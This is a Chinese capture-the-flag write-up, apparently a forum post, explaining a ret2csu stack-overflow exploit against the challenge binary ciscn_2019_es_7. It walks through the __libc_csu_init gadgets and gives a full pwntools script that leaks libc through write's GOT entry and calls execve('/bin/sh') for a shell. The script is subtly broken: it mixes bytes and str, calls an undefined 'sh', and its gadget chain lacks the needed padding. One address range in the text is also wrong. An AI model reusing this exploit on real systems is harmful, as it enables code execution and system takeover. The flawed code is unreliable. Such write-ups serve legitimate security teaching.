ret2csu

1.main函数F5,发现没有什么进入vuln函数

缓冲区覆盖返回地址的大小是0x10+8,有存在栈溢出,shift+F12没有找到/bin/sh和system函数,但是有libc函数,所以可以利用对其做初始化的__libc_csu_init函数来控制寄存器的数据。

2.空格查看__libc_csu_init函数的汇编如下

(1)可以发现在0x40059A到0x40054A中pop了一堆寄存器,因为pop指令是使从栈中弹出来的值储存在寄存器里,所以我们可以通过栈溢出来修改栈上的数据,使其弹出我们想要的值到寄存器中,因此,我们可以控制rbx,rbp,r12,r13,r14,r15这六个寄存器中的数据。

(2)而在0x400589的位置调用了一个函数,地址为【r12+rbx*8】,所以,如果我们合理的修改r12和rbx这俩寄存器的值,就可以调用我们想调用的函数。比较方便的一个选择是将rbx赋值为0,这样r12就可以是任意的我们想调用的函数的那个地址。

(3)在0x400580到0x400586之间,是把r13的值赋给rdx,把r14的值赋给rsi,把r15的值赋给edi(其实也就是rdi,因为高32位为0用不到)

从左到右分别是:寄存器的值--它指向的地址--地址处存储着字符串

而rdi`0x1`,表示一个标准输出文件描述符(stdout)。

(4)在0x40058D到0x400594之间可以看出rbx与rbp的关系:rbp=rbx+1,如果rbx和rbp不相等则跳转到0x400580重新执行这一段。因为(2)中已经将rbx赋值为0了,为了让程序继续往下走可以将rbp赋值为1

3.解题思路:需要构造三回ROP链

(1)第一回用csu函数csu(rbx, rbp, r12, r13, r14, r15, last)泄露write函数got表地址,从而获得libc版本,得到基地址从而获得execve的地址。

(2)第二回用csu函数csu(rbx, rbp, r12, r13, r14, r15, last)调用read函数,将execve函数和'/bin/sh\x00'字符串写入bss段

(3)第三回用csu函数csu(rbx, rbp, r12, r13, r14, r15, last)调用execve函数,获得shell权限。

4.想要构造这三条ROP链要知道以下函数:

(1)write(int fd, const void *buf, size_t count)

fd:要写入的文件描述符。标准输出(stdout)的文件描述符是1,标准错误输出(stderr)的文件描述符是2。

buf:简单来说就是传入缓冲区的地址,将想调用的函数写在栈上

count:要写入的字节数。而在这里我们想把write的got表地址写入栈上,x86_64位系统上,函数的got表地址占据8个字节,也就是说count=8

(2)read(int fd, void *buf, size_t count)

fd:要读取的文件描述符。标准输入(stdin)的文件描述符是0.

buf:传入缓冲区的地址,将想调用的函数写在栈上

count:要读取的最大字节数。这里我们应该使count=16,因为16刚好可以读取到read函数的返回地址和参数。这些读取到的数据可能包含重要的地址信息,比如 `libc` 基地址,后续可以通过计算偏移量来找到其他函数的地址。

(3)execve(const char *filename, char *const argv[], char *const envp[])

filename:要执行的新程序的路径名。这个参数是一个字符串,指定了要执行的程序的文件路径,这里filename可以为【bss_base(基地址)+8】,‘+8’表示在该地址的基础上偏移8个字节,通过将 `/bin/sh\x00` 这个字符串存储到bss_base(基地址)+8,就可以将 `/bin/sh` 的路径传递给 `execve` 函数,从而执行 `/bin/sh` 程序,实现获取 shell 权限的目的。

argv:参数数组。数组的最后一个元素必须为NULL(0)。

envp:环境变量数组。数组的最后一个元素必须为NULL。

5.编写脚本

from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level='debug'

ciscn_2019_es_7=ELF('./ciscn_2019_es_7')#使用pwntools中的ELF类加载level5二进制文件
p=process('./ciscn_2019_es_7')# 启动一个进程,运行level5二进制文件,并将其赋给p变量
#p=remote("")

write_got=ciscn_2019_es_7.got['write']#获取write函数的GOT地址。
read_got=ciscn_2019_es_7.got['read']#获取read函数的GOT地址。
main_addr=ciscn_2019_es_7.symbols['main']#获取main函数的地址。
bss_base=ciscn_2019_es_7.bss()#获取bss段的基地址
csu_front_addr=0x400580
csu_end_addr=0x40059A

#p64(rbx):将 64 位整数 rbx 转换为字节序列(bytes)
def csu(rbx, rbp, r12, r13, r14, r15, last): #定义一个函数csu,last是目标函数的入口地址      
    payload=b'a'*(0x10+8)#将栈上写满垃圾数据并覆盖返回地址,这样就不会返回到程序指定位置
    payload+=p64(csu_end_addr)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13) +p64(r14)+p64(r15)  
    payload+=p64(csu_front_addr)
#这样写的原因是csu函数会先跳到csu_end_addr的地址,将后面的寄存器的值加载到相应的参数寄存器中
#最后通过 jmp csu_front_addr 返回到 csu 函数的开头继续执行
    payload+=p64(last)#目标函数
    p.send(payload)#发送payload
    sleep(1)#等待一秒钟

  

# write(1,write_got,8)
csu(0, 1, write_got, 8, write_got, 1, main_addr)#将write_got写入栈上并执行
write_addr = u64(p.recv(8))#接收8字节大小的write地址
libc=LibcSearcher('write',write_addr )#获取write在libc库中的地址
libc_base=write_addr-libc.dump('write')#基地址=真实地址-偏移地址
execve_addr=libc_base+libc.dump('execve')
log.success('execve_addr ' + hex(execve_addr))#log.success() 用于输出一个成功的提示消息,并将 execve_addr 的十六进制表示附加在消息后面
#gdb.attach(p)

  
# read(0,bss_base,16)
csu(0, 1, read_got, 16, bss_base, 0, main_addr)#将基地址写入栈上并执行read函数
p.send(p64(execve_addr) + '/bin/sh\x00')#将execve_addr转换为长度为8字节的二进制数据并写入第一个参数是要执行的程序路径/bin/sh

  
# execve(bss_base+8)
csu(0, 1, bss_base, 0, 0, bss_base + 8, main_addr)#跳转到bss_base上执行/bin/sh
sh.interactive()

#re2csu#
全部评论

相关推荐

11-14 16:13
已编辑
重庆科技大学 测试工程师
Amazarashi66:不进帖子我都知道🐮❤️网什么含金量
点赞 评论 收藏
分享
评论
点赞
收藏
分享
牛客网
牛客企业服务